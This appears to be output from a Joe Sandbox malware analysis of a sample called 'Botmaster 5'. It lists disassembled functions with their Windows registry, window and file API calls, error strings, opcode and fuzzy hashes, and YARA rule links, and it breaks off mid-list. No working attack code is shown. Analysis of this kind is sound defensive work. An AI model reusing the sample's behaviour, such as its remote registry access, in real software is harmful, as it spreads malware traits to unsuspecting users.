                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 0040B084 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 148registryCOMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • RegCreateKeyExW.ADVAPI32(?,000F003F,00000000,00000000,00000000,000F003F,00000001,00000001,?,00000001,00000000,00000000,00000000), ref: 0040B1F3
                                                                                                                                                                                                                  • RegConnectRegistryW.ADVAPI32(00000001,?,?), ref: 0040B20B
                                                                                                                                                                                                                  • RegCreateKeyExW.ADVAPI32(?,00000001,00000000,00000000,00000000,000F003F,?,00000001,00000001,00000001,?,?,00000001,00000000,00000000,00000000), ref: 0040B23F
                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,?,00000001,00000000,00000000,00000000,000F003F,?,00000001,00000001,00000001,?,?,00000001,00000000,00000000), ref: 0040B254
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: Create$CloseConnectRegistry
                                                                                                                                                                                                                  • String ID: ERROR, #HKEY is empty$ERROR, false type$ERROR, subkeyname is empty
                                                                                                                                                                                                                  • API String ID: 3739685399-669851651
                                                                                                                                                                                                                  • Opcode ID: 757f646d48c2b9c1df1c2ad70befea8467691b7b46ef49cec6f08e0c8b7fd753
                                                                                                                                                                                                                  • Instruction ID: d79bea859f8f122aecf4f0144055704a2379aabbd7284b72be669317afa814dc
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 757f646d48c2b9c1df1c2ad70befea8467691b7b46ef49cec6f08e0c8b7fd753
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EC517C70208301ABC711AF11EC91A6F77A5EF54344F20883FF5826A1A1EB799C56DB9F
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 0040C4A4 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 138registryCOMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • RegOpenKeyExW.ADVAPI32(00000000,0040A2AC,00000000,00020019,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,80000004,0040A2AC), ref: 0040C5F5
                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?,00000000,0040A2AC,00000000,00020019,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,80000004), ref: 0040C642
                                                                                                                                                                                                                    • Part of subcall function 004299B0: RtlAllocateHeap.NTDLL(00990000,00000000,?,?,?,00407074,?,0000004E,00000000,00000000,?,00000000), ref: 004299D6
                                                                                                                                                                                                                  • RegConnectRegistryW.ADVAPI32(00000000,00000000,0040A2AC), ref: 0040C60D
                                                                                                                                                                                                                  • RegOpenKeyExW.ADVAPI32(00000000,0040A2AC,00000000,00020019,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,80000004,0040A2AC), ref: 0040C62D
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  • ERROR, subkeyname is empty, xrefs: 0040C54C
                                                                                                                                                                                                                  • ERROR, #HKEY is empty, xrefs: 0040C521
                                                                                                                                                                                                                  • ERROR, sub key not found, xrefs: 0040C659
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: Open$AllocateCloseConnectHeapRegistry
                                                                                                                                                                                                                  • String ID: ERROR, #HKEY is empty$ERROR, sub key not found$ERROR, subkeyname is empty
                                                                                                                                                                                                                  • API String ID: 2391762236-1661012673
                                                                                                                                                                                                                  • Opcode ID: 65729a938f8d0291f0a0f04b9f5beaa9430504905f6348d4eb981ea4e64aa9be
                                                                                                                                                                                                                  • Instruction ID: 7331ad5c3f4a4468b582587033725609b3540ff9f57beb01662973def572fbbd
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 65729a938f8d0291f0a0f04b9f5beaa9430504905f6348d4eb981ea4e64aa9be
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 08416D70208311EBC711AB20ECC1A2F77A5EF44308F608A3FF546A61A1DB799C569B5F
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 004320FD Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 71memoryCOMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                    • Part of subcall function 00431FC0: _vsnwprintf.MSVCRT ref: 00431FD4
                                                                                                                                                                                                                  • GetPropW.USER32(?,?), ref: 00432123
                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,?), ref: 00432178
                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000), ref: 00432182
                                                                                                                                                                                                                  • RemovePropW.USER32(?,?), ref: 0043218B
                                                                                                                                                                                                                  • CallWindowProcW.USER32(?,?,00000082,?,?), ref: 004321A6
                                                                                                                                                                                                                  • DefWindowProcW.USER32(?,?,?,?), ref: 004321BA
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: FreeHeapProcPropWindow$CallRemove_vsnwprintf
                                                                                                                                                                                                                  • String ID: PB_GadgetStack_%i
                                                                                                                                                                                                                  • API String ID: 178367583-1190326050
                                                                                                                                                                                                                  • Opcode ID: 96cb807580e01b1e027b59f78468675e3519b2a3243b8aea9f3e2cd938c60435
                                                                                                                                                                                                                  • Instruction ID: cc478df7d21734f91895439bede0890fa443c0ac92021617ec81fb51e7e98a3c
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 96cb807580e01b1e027b59f78468675e3519b2a3243b8aea9f3e2cd938c60435
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F5213972500209FFCF119F90EE84CAA7B7AFB08355F00807AFA05A6220D7B59D61DF96
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 0041BFA4 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 39libraryloaderCOMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                    • Part of subcall function 00429C80: RtlReAllocateHeap.NTDLL(00990000,00000000,009905D0,000041FE,00000000,00000000), ref: 00429CCA
                                                                                                                                                                                                                  • GetTempPathW.KERNEL32(00000104,00000000,00000104,00000007,?,?,?,?,0040119E,00000000,00000000,00000000,00000000,00000000,00000000,00000004), ref: 0041BFBB
                                                                                                                                                                                                                  • LoadLibraryW.KERNEL32(Kernel32.DLL,?,?,?,?,0040119E,00000000,00000000,00000000,00000000,00000000,00000000,00000004,00000006,00000008,0043A820), ref: 0041BFC8
                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetLongPathNameW), ref: 0041BFDA
                                                                                                                                                                                                                  • GetLongPathNameW.KERNELBASE(00000000,00000000,00000104,?,?,?,?,0040119E,00000000,00000000,00000000,00000000,00000000,00000000,00000004,00000006), ref: 0041BFE7
                                                                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,?,?,?,0040119E,00000000,00000000,00000000,00000000,00000000,00000000,00000004,00000006,00000008,0043A820), ref: 0041BFEC
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: LibraryPath$AddressAllocateFreeHeapLoadLongNameProcTemp
                                                                                                                                                                                                                  • String ID: GetLongPathNameW$Kernel32.DLL
                                                                                                                                                                                                                  • API String ID: 752937943-2943376620
                                                                                                                                                                                                                  • Opcode ID: f92547339a9f1bbdf602d2c101e8fa0f61151d13e03c306aa0f96d5799182fd1
                                                                                                                                                                                                                  • Instruction ID: 5ebeb1945e8f50c41bbf376dc9275f2ec5277648bf268264d6d83e50987f4f5f
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f92547339a9f1bbdf602d2c101e8fa0f61151d13e03c306aa0f96d5799182fd1
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C1F089722011657B921167F6AC4CDEB7AECDF85755B014039F904D1111EBF94C01C6FD
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 00421DB6 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 88COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • memset.MSVCRT ref: 00421DDF
                                                                                                                                                                                                                  • CreateWindowExW.USER32(00000000,Button,?,50020007,?,?,?,?,00000000,000000FF,00000000,-FFFFFEC7), ref: 00421E41
                                                                                                                                                                                                                  • CreateWindowExW.USER32(00000000,Static,00000000,50820001,?,?,?,?,00000000,000000FF,00000000,-FFFFFEC7), ref: 00421E90
                                                                                                                                                                                                                  • SetWindowLongW.USER32(00000000,000000FC,00421D29), ref: 00421EA0
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: Window$Create$Longmemset
                                                                                                                                                                                                                  • String ID: Button$Static
                                                                                                                                                                                                                  • API String ID: 3954717334-2498952662
                                                                                                                                                                                                                  • Opcode ID: 6386a1e7a9bab0b02c14d0fef1874f104d960f6eaa895ba2db9cf2d210c03f90
                                                                                                                                                                                                                  • Instruction ID: f191da2aabf9061e591f0709662476581d85f195b97abb863307a1f0ef337aad
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6386a1e7a9bab0b02c14d0fef1874f104d960f6eaa895ba2db9cf2d210c03f90
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6B31D431600225FBCF215F81FC04E9B3F6AFB69765F110226F91591171E3BA4860EF9A
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 004200E8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 73COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • memset.MSVCRT ref: 00420114
                                                                                                                                                                                                                  • GetSystemMetrics.USER32(00000044), ref: 00420152
                                                                                                                                                                                                                  • GetSystemMetrics.USER32(00000045), ref: 0042015B
                                                                                                                                                                                                                  • CreateWindowExW.USER32(?,STATIC,00000000,50000100,?,?,?,?,00000000,000000FF,00000000,-FFFFFEC7), ref: 00420194
                                                                                                                                                                                                                  • SetWindowLongW.USER32(00000000,000000FC,0041FDB4), ref: 004201A8
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: MetricsSystemWindow$CreateLongmemset
                                                                                                                                                                                                                  • String ID: STATIC
                                                                                                                                                                                                                  • API String ID: 498952651-1882779555
                                                                                                                                                                                                                  • Opcode ID: 8c02f266b4ca1e4da6b6fa3c692244ff65e9e0e3bf4176f830a88228ed73d8fc
                                                                                                                                                                                                                  • Instruction ID: 7744e577b02ca489db7dac857713f03384ebf94a729d5319be29522e2ee7859e
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8c02f266b4ca1e4da6b6fa3c692244ff65e9e0e3bf4176f830a88228ed73d8fc
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 14215171A00218BFDB019FA5EC449AA3BA9EB09358F00413AF90596271E7F94C91DB9E
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 00426B6D Relevance: 9.1, APIs: 6, Instructions: 59memoryfileCOMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000,00000000,?,?,?,00426C0F,?,?,00000000,0040159D), ref: 00426B8B
                                                                                                                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,?,00426C0F,?,?,00000000,0040159D,000000C8,00000000,0046AFD8,00000000), ref: 00426B9D
                                                                                                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,00000000,?,?,?,?,?,00426C0F,?,?,00000000,0040159D,000000C8,00000000,0046AFD8,00000000), ref: 00426BAD
                                                                                                                                                                                                                  • ReadFile.KERNELBASE(?,00000000,00000000,?,00000000,?,?,?,?,?,00426C0F,?,?,00000000,0040159D,000000C8), ref: 00426BC3
                                                                                                                                                                                                                  • RtlFreeHeap.NTDLL(00000000,00000000,?,?,?,?,?,00426C0F,?,?,00000000,0040159D,000000C8,00000000,0046AFD8,00000000), ref: 00426BE7
                                                                                                                                                                                                                  • FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?,00426C0F,?,?,00000000,0040159D,000000C8,00000000,0046AFD8,00000000,00000001), ref: 00426BF0
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: File$Heap$AllocateChangeCloseCreateFindFreeNotificationReadSize
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 2261520354-0
                                                                                                                                                                                                                  • Opcode ID: 580bce743d05f54e19f040ff96d52d026498e0ddf3a8e1f3768a57371c7e0e84
                                                                                                                                                                                                                  • Instruction ID: 5ce91b61363d4b48814312fd394d0a9feabefdf2ebc81d0f696142e0a8217438
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 580bce743d05f54e19f040ff96d52d026498e0ddf3a8e1f3768a57371c7e0e84
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3D1127B1600168BFDB215FA5EC88EAF7F7DEB417A0F10813AF801E6160E6B09D10CA25
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 00421C04 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 72COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • memset.MSVCRT ref: 00421C2E
                                                                                                                                                                                                                  • CreateWindowExW.USER32(?,Edit,00000000,?,?,?,?,?,00000000,000000FF,00000000,-FFFFFEC7), ref: 00421CBC
                                                                                                                                                                                                                  • SetWindowLongW.USER32(00000000,000000FC,00421BC5), ref: 00421CE0
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: Window$CreateLongmemset
                                                                                                                                                                                                                  • String ID: 05Vo$Edit
                                                                                                                                                                                                                  • API String ID: 2917088559-2293288859
                                                                                                                                                                                                                  • Opcode ID: 0eeab1b251d201721b721a4a8896c99e02515dda87542d10bf2639b33ee2d22d
                                                                                                                                                                                                                  • Instruction ID: d9c918d304344f383ae810d655fdad3e2823fb455bfc82bd3410eed2219fe931
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0eeab1b251d201721b721a4a8896c99e02515dda87542d10bf2639b33ee2d22d
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8821DEB1600215AFDB204F16EC09F163EB9EB50365F10422AF560962B0EBF99864CB9E
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 00424F1B Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 60COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                    • Part of subcall function 00424A65: GetPropW.USER32(?,PB_WindowID), ref: 00424AAC
                                                                                                                                                                                                                    • Part of subcall function 00424A65: GetParent.USER32(?), ref: 00424ABC
                                                                                                                                                                                                                  • GetPropW.USER32(?,PB_MDI_Gadget), ref: 00424F43
                                                                                                                                                                                                                  • DefFrameProcW.USER32(?,00000000,?,?,?), ref: 00424F84
                                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000), ref: 00424F8E
                                                                                                                                                                                                                  • DefWindowProcW.USER32(?,?,?,?), ref: 00424FA4
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: ProcProp$ErrorFrameLastParentWindow
                                                                                                                                                                                                                  • String ID: PB_MDI_Gadget
                                                                                                                                                                                                                  • API String ID: 2919463471-983833826
                                                                                                                                                                                                                  • Opcode ID: 089d11b54ea7f54b31f33244deb31a2c5ebebf61600f24ae2f7062330dbe2a0d
                                                                                                                                                                                                                  • Instruction ID: d6dffba87d56a591fab662c0904b9b593c86689b7a54ecd63f64068588edc274
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 089d11b54ea7f54b31f33244deb31a2c5ebebf61600f24ae2f7062330dbe2a0d
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5A11A032704239ABDF209E44FD84EBB3A2CFBC4751F420027F91552280C7B89C51CABA
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 0042352C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 47windowCOMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • SetWindowLongW.USER32(?,000000FC,0042346F), ref: 00423566
                                                                                                                                                                                                                  • SetWindowLongW.USER32(?,000000F4,000000FF), ref: 00423571
                                                                                                                                                                                                                  • SetPropW.USER32(?,PB_ID,000000FF), ref: 0042357C
                                                                                                                                                                                                                  • SendMessageW.USER32(?,00000030,?,00000001), ref: 0042358D
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
